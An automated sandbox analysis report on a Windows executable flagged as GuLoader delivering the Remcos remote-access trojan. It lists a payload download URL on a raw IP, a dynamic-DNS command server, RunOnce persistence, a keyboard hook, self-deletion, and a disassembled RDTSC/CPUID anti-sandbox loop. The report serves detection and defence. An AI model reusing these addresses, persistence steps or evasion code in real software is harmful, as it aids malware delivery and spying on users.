Windows Analysis Report Fec9qUX4at.exe

Overview

General Information

Sample Name: Fec9qUX4at.exe
Analysis ID: 458355
MD5: 2046b941817392e3815535fccb1f39dc
SHA1: 843d243a71131baf9fbe0fcf4ba129f51ee74c8f
SHA256: c0d3da1cefd1a979c8b8ce102fd5d3ff090779f72f4d1098eb383cbbb3480bee
Tags: exe
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Deletes itself after installation
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe Virustotal: Detection: 28% Perma Link
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe ReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted file
Source: Fec9qUX4at.exe Virustotal: Detection: 28% Perma Link
Source: Fec9qUX4at.exe ReversingLabs: Detection: 13%
Yara detected Remcos RAT
Source: Yara match File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Fec9qUX4at.exe Joe Sandbox ML: detected

Compliance:

barindex
Uses 32bit PE files
Source: Fec9qUX4at.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Uses dynamic DNS services
Source: unknown DNS query: name: wealthyrem.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.3:49733 -> 194.5.97.128:39200
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANILENKODE DANILENKODE
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119
Source: global traffic HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: wealthyrem.ddns.net
Source: Fec9qUX4at.exe, 00000011.00000002.487607520.00000000009A7000.00000004.00000020.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Installs a global keyboard hook
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Fec9qUX4at.exe Jump to behavior
Creates a DirectInput object (often for capturing keystrokes)
Source: Fec9qUX4at.exe, 00000000.00000002.338277052.000000000063A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Remcos RAT
Source: Yara match File source: Process Memory Space: Fec9qUX4at.exe PID: 1152, type: MEMORYSTR

System Summary:

barindex
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5586A NtAllocateVirtualMemory, 0_2_04F5586A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F505E0 EnumWindows,NtWriteVirtualMemory, 0_2_04F505E0
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F509C7 NtWriteVirtualMemory, 0_2_04F509C7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58F67 NtProtectVirtualMemory, 0_2_04F58F67
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F542D5 NtWriteVirtualMemory, 0_2_04F542D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F558D5 NtAllocateVirtualMemory, 0_2_04F558D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54693 NtWriteVirtualMemory, 0_2_04F54693
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54A46 NtWriteVirtualMemory, 0_2_04F54A46
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54A2D NtWriteVirtualMemory, 0_2_04F54A2D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54C15 NtWriteVirtualMemory, 0_2_04F54C15
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58FBB NtProtectVirtualMemory, 0_2_04F58FBB
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5475A NtWriteVirtualMemory, 0_2_04F5475A
Detected potential crypto function
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_00401144 0_2_00401144
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F584C9 0_2_04F584C9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5209D 0_2_04F5209D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50C76 0_2_04F50C76
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F55661 0_2_04F55661
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5586A 0_2_04F5586A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F505E0 0_2_04F505E0
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F509C7 0_2_04F509C7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F59577 0_2_04F59577
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F52559 0_2_04F52559
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F542D5 0_2_04F542D5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F514D1 0_2_04F514D1
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F514D9 0_2_04F514D9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F506D9 0_2_04F506D9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50CC2 0_2_04F50CC2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F510C2 0_2_04F510C2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F520C2 0_2_04F520C2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F538B9 0_2_04F538B9
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F57AA5 0_2_04F57AA5
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F57EAD 0_2_04F57EAD
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F52AAE 0_2_04F52AAE
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54693 0_2_04F54693
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54292 0_2_04F54292
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58C9D 0_2_04F58C9D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F53051 0_2_04F53051
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F55C5C 0_2_04F55C5C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54A46 0_2_04F54A46
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5864F 0_2_04F5864F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F53424 0_2_04F53424
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54A2D 0_2_04F54A2D
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F54C15 0_2_04F54C15
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F55E11 0_2_04F55E11
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5380C 0_2_04F5380C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F585F7 0_2_04F585F7
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50BE6 0_2_04F50BE6
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F53FDB 0_2_04F53FDB
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F577CC 0_2_04F577CC
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F53996 0_2_04F53996
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F51D86 0_2_04F51D86
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58181 0_2_04F58181
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F51D8F 0_2_04F51D8F
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F52D7C 0_2_04F52D7C
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F57F61 0_2_04F57F61
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58355 0_2_04F58355
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F58759 0_2_04F58759
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5475A 0_2_04F5475A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5215A 0_2_04F5215A
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F5293E 0_2_04F5293E
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F52138 0_2_04F52138
PE file contains strange resources
Source: Fec9qUX4at.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Fec9qUX4at.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FANEBREREN.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: FANEBREREN.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: Fec9qUX4at.exe, 00000000.00000002.338068961.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000000.00000002.338242291.00000000005F0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491236633.000000001E770000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000000.336595549.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.490989304.000000001DD60000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe.mui` vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.487682581.0000000000A0E000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe, 00000011.00000002.491075491.000000001E670000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs Fec9qUX4at.exe
Source: Fec9qUX4at.exe Binary or memory string: OriginalFilenameCLUBWOMAN.exe vs Fec9qUX4at.exe
Uses 32bit PE files
Source: Fec9qUX4at.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/4@1/2
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File created: C:\Users\user\AppData\Roaming\remcos Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File created: C:\Users\user\AppData\Local\Temp\~DFDAA17C5C5846B2AF.TMP Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Source: Fec9qUX4at.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Fec9qUX4at.exe Virustotal: Detection: 28%
Source: Fec9qUX4at.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File read: C:\Users\user\Desktop\Fec9qUX4at.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs'
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Users\user\Desktop\Fec9qUX4at.exe 'C:\Users\user\Desktop\Fec9qUX4at.exe' Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wqhhwuvojbjzckdf.vbs' Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.348987507.0000000004F50000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_00407CF7 push eax; ret 0_2_00407CF8
Source: initial sample Static PE information: section name: .text entropy: 7.05513425915
Source: initial sample Static PE information: section name: .text entropy: 7.05513425915

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File created: C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.exe Jump to dropped file

Boot Survival:

barindex
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS C:\Users\user\AppData\Local\Temp\DYKKERDRAGTS\FANEBREREN.vbs Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce AMPHITHYRONS Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installation
Source: C:\Windows\SysWOW64\wscript.exe File deleted: c:\users\user\desktop\fec9qux4at.exe Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe Code function: 0_2_04F50C76 TerminateProcess, 0_2_04F50C76
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F54701 second address: 0000000004F54701 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 000000000056160D second address: 000000000056160D instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000000565E34 second address: 0000000000565E34 instructions:
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 00000000005638CF second address: 00000000005638CF instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Fec9qUX4at.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\FANEBREREN.EXE\DYKKERDRAGTSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEAMPHITHYRONS
Source: Fec9qUX4at.exe, 00000000.00000002.349028994.0000000004F60000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Fec9qUX4at.exe RDTSC instruction interceptor: First address: 0000000004F57394 second address: 0000000004F57394 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx], al 0x0000000c pushad 0x0000000d mov ah, 58h 0x0000000f cmp ah, 00000058h 0x00000012 jne 00007F9040DE846Ch 0x00000018 popad 0x00000019 inc ebx 0x0000001a inc edx 0x0000001b dec ecx 0x0000001c test ecx, ecx 0x0000001e jne 00007F9040DEB55Fh 0x00000020 mov al, byte ptr [edx] 0x00000022 pushad 0x00000023 rdtsc
